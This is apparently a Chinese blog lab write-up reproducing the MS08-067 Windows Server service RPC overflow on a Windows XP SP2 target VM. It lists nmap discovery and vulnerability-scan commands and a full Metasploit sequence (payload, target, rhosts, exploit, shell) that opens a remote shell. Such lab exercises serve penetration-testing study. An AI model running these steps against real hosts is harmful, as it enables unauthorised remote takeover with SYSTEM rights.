文章目录

  • 一、漏洞详情
  • 二、靶机搭建
    • kali
    • Windows XP SP2 (Simplified Chinese )
  • 三、利用nmap对靶机扫描
  • 四、漏洞利用
  • 五、总结

一、漏洞详情

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。

二、靶机搭建

kali

Windows XP SP2 (Simplified Chinese )

下载平台:

https://next.itellyou.cn/Original/

下载链接:

ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/

(1)、配置IP:

(2)、关闭防火墙:

三、利用nmap对靶机扫描

(1)、利用nmap探测主机存活:

注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101

nmap -sP -T4 172.16.12.0/24

(2)、利用nmap自带脚本对目标IP扫描:

nmap -sT -A --script=vuln -P0 172.16.12.101

注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。

四、漏洞利用

(1)、搜索 MS08_067漏洞:

search ms08

(2)、选择MS08_067漏洞:

use  0

(3)、查看MS08_067漏洞的payloads:

show payloads

(4)、选择42号payload:

set  payload 42

(5)、查看MS08_067漏洞所适用的Windows版本:

show targets

(6)、设置对应的目标靶机Windows版本:

set target  10

(7)、查看payload的详细信息:

show options

(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置

set rhosts  172.16.12.101

(9)、初始化攻击环境,并开始对目标靶机进行攻击:

exploit

(10)、进入目标系统的互交命令行shll中:

shell

(1)、用ipconfig验证:

ipconfig

五、总结

写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!

Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)相关推荐

  1. 如何在单台计算机上配置 Windows XP SP2 网络保护技术

    简介 连接至 Internet 的计算机可能会出现安全漏洞并遭受***. ***是指绕过计算机安全保护或导致您无法使用计算机的故意行为. 在 Microsoft Windows XP Service ...

  2. [转载]受 Windows XP SP2 影响的软件列表

    Microsoft Windows XP Service Pack 2 (SP2) 中引入了一些新特性用来提高系统的安全和性能.但是这些更新也影响了一些应用程序在操作系统上的正常功能.官方近日提供了一 ...

  3. Windows xp sp2详细安装过程详解

    前言: 先来一堆废话......啊啊啊啊啊~~ 现在我们基本上都用不到xp系统了,至少在个人的笔记本上应该不用了,但是某些单位或企业的机房里的台式电脑还是xp系统,所有这也给不怀好意的攻击者提供了攻击 ...

  4. Windows XP SP2疑难速解50问

    一.SP2的十大亮点 要想系统地了解Windows XP SP2可能会引起的问题,并快速诊断问题的原因所在,应先对Windows XP SP2的新功能有个基本的了解,这就是Windows XP S ...

  5. 使用 MDT2008 轻量部署进行 Windows XP SP2 简单部署

    使用 MDT2008 轻量部署进行 Windows XP SP2 简单部署 [url]http://www.yangzhip.net.cn/article.asp?id=12[/url] 转载于:ht ...

  6. 关于windows xp sp2/sp3 中tcpip.sys对于Raw socket的限制

    WINDOWS XP SP2修改了TCPIP.SYS,增加了对于RAW SOCKET的发送和伪造源地的限制,详情如下 : 1) 不能通过raw socket发送TCP报文.做此尝试时会得到10004号 ...

  7. WINDOWS XP SP2 NTFS EFS加密文件的解密案例

       北京一用户,原系统分为3个区,C盘安装WINDOWS XP SP2,D及E盘为用户重要数据区,其中D盘有用户特别重要的几个文件,当初为安全性考虑,设置了NTFS的EFS加密,后系统运行缓慢,重装 ...

  8. IMPORTANT: BizTalk Server 2004 fixes for Windows XP SP2 and .NET FW 1.1 SP1

    Scott Woodgate 的EMail中说: IMPORTANT: BizTalk Server 2004 fixes for Windows XP SP2 and  .NET FW 1.1 SP ...

  9. Windows XP SP2下载[转自Mydrivers.com]

    微软今天在官方网站Downloads当中提供英文版和德文版Windows XP SP2下载,其中SP2英文版官方文件名是WindowsXP-KB835935-SP2-ENU.exe,文件大小27239 ...

最新文章

  1. [转] 程序员面试题精选100题(35)-找出两个链表的第一个公共结点
  2. SectionIndexer中的getSectionForPosition()与getPositionForSection()解惑
  3. 前端开发神器 vscode 常用快捷键
  4. springboot项目根据不同的环境启动不同的配置,如开发环境dev,测试环境sit,生产环境application...
  5. linux下查看一个进程的启动时间和运行时间
  6. node.js 模块_如何创建Node JS可重用模块
  7. Axure RP 10 安装方法
  8. android google GMS服务包安装
  9. 计算机课教师评价,教师课堂评价语集锦
  10. 用10行代码实现鉴黄
  11. 初识Java反序列化
  12. postgresql中DROP OWNED BY user_name对普通用户和只读用户的区别
  13. STEP2——《数据分析:企业的贤内助》重点摘要笔记(六)——数据描述
  14. 纯html5的树形菜单,一个简单的js树形菜单
  15. 基于任务点的加速仿真
  16. VRP介绍以及AC初始化配置介绍
  17. dllreg解除服务器注册,最简单的修复IE浏览器的方法:注册表重新注册DLL
  18. Fortinet :《2021 年OT与网络安全现状报告》之「OT安全洞察」
  19. pdf解析,获取字段数据
  20. 历届国际足联世界足球先生

热门文章

  1. OO包设计原则遵循度自动分析检查工具JDM简介(原创)
  2. 程序员约架事件中,薛非到底是因为不会用Github还是不会写Tokenizer而没有应战?...
  3. 吴恩达OpenAI最新课程:prompt-engineering-for-developers读书笔记
  4. Qt之自定义QLineEdit
  5. 计算机专业英语教程(第二版)Chapter 4 Database Fundamentals
  6. 比 Elasticsearch 更快 RediSearch + RedisJSON = 王炸
  7. 伦敦的威斯敏斯特大教堂地下室的墓碑林中,一块震撼全世界的一段碑文。
  8. Ubuntu16.04 anaconda 上安装 opencv
  9. 编程中汉字编码和英文编码的语言融合
  10. 9月30日科技资讯|罗永浩与锤子手机撇清关系;微软回应「高管传奇」经历;Rust 1.38 稳定版发布